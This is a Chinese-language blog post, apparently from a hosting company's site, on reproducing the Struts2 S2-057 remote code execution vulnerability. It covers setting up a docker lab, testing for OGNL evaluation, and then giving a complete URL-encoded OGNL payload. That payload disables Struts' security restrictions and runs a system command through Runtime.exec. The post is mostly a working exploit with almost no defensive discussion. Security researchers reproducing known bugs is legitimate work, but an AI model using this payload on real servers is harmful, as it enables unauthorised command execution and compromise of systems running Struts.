新西兰服务器

如何进行Struts2-057 远程代码执行漏洞复现


如何进行Struts2-057 远程代码执行漏洞复现

发布时间:2021-12-24 21:59:21 来源:高防服务器网 阅读:76 作者:柒染 栏目:网络管理

这篇文章将为大家详细讲解有关如何进行Struts2-057 远程代码执行漏洞复现,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

一、使用docker搭建环境

访问页面     http://ip:8080/struts2-showcase

二、漏洞验证

访问  /struts2-showcase/${(111+111)}/actionChain1.action  试试看

变成了  /struts2-showcase/222/register2.action

执行了,说明可能存在struts2-057漏洞

三、漏洞利用

执行命令的poc

/index/%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action

执行,得到了id命令执行的返回(url中)

关于如何进行Struts2-057 远程代码执行漏洞复现就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

[微信提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。

[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]
[